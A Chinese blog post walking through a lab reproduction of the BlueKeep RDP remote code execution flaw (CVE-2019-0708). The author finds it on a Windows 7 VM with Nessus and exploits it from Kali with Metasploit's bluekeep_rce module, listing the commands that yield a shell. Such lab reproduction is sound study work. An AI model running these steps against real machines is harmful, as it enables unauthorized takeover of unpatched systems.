见此如朕亲临,尔等还不跪下|

gloves7

园龄:1年6个月粉丝:1关注:0

【漏洞复现】远程桌面服务远程执行代码[CVE-2019-0708]

【CVE-2019-0708】远程桌面服务远程执行代码漏洞

  当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求时,远程桌面服务中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。

靶机: windows7 IP:192.168.64.178

攻击机:KALI2022 IP:192.168.64.157

漏扫工具:Nessus

1.发现漏洞

使用Nessus对靶机进行漏洞扫描,发现存在【CVE-2019-0708】远程桌面服务远程执行代码漏洞。

 2.漏洞利用

使用kali并启动msfconsole

 搜索CVE-2019-0708可利用的EXP

#  search 0708

 

 使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce

#  use 1

  设置参数

set  RHOST 192.168.64.178

set target 5   #因为靶机是vmware创建的虚拟机,因此这里选择5,可根据实际情况选择

 执行攻击

#  exploit 

 成功获取权限,可执行shell

 

成功的关键:需要windows7靶机关闭防火墙,并且开启远程桌面。

 

本文作者:gloves7

本文链接:https://www.cnblogs.com/gloves7/p/17734511.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   gloves7  阅读(246)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起